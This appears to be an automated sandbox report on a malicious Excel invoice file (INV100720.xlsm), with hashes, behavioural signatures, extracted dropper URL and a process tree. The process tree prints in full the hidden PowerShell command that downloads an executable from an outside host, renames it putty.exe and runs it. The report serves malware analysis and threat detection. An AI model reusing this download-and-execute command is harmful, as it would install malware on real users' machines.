Analysis
-
max time kernel
130s -
max time network
136s -
platform
windows7_x64 -
resource
win7 -
submitted
11-07-2020 06:07
Static task
static1
Behavioral task
behavioral1
Sample
INV100720.xlsm
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
INV100720.xlsm
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
INV100720.xlsm
-
Size
399KB
-
MD5
97d1bf3b13839cb70157bbebc2ab1f8c
-
SHA1
b12d4e4b14d3b443e1abb9b6a5a9b6b74de2686a
-
SHA256
9a63be97d600c50abdddc22afd998e25ddac5030bcc4846b97cf7e1932eae7b8
-
SHA512
1bf7e0619db7bbf6bdf4a67608f5d74144ee114c769554e15af72bbd027d792f0e68cf36ea4839b6d37bafab14f73a240ef9d5381f83726a147e51a62e533bb0
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://comawhimplet.com/nccd.exe
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 1612 wrote to memory of 1804 1612 EXCEL.EXE powershell.exe PID 1612 wrote to memory of 1804 1612 EXCEL.EXE powershell.exe PID 1612 wrote to memory of 1804 1612 EXCEL.EXE powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1804 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1804 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
powershell.exepid process 1804 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1612 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1804 1612 powershell.exe EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1804 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\INV100720.xlsm1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://comawhimplet.com/nccd.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: GetForegroundWindowSpam
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:1804
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1612-1-0x0000000007320000-0x0000000007420000-memory.dmpFilesize
1024KB
-
memory/1612-3-0x0000000007320000-0x0000000007420000-memory.dmpFilesize
1024KB
-
memory/1612-4-0x0000000007320000-0x0000000007420000-memory.dmpFilesize
1024KB
-
memory/1612-5-0x0000000007320000-0x0000000007420000-memory.dmpFilesize
1024KB
-
memory/1804-6-0x0000000000000000-mapping.dmp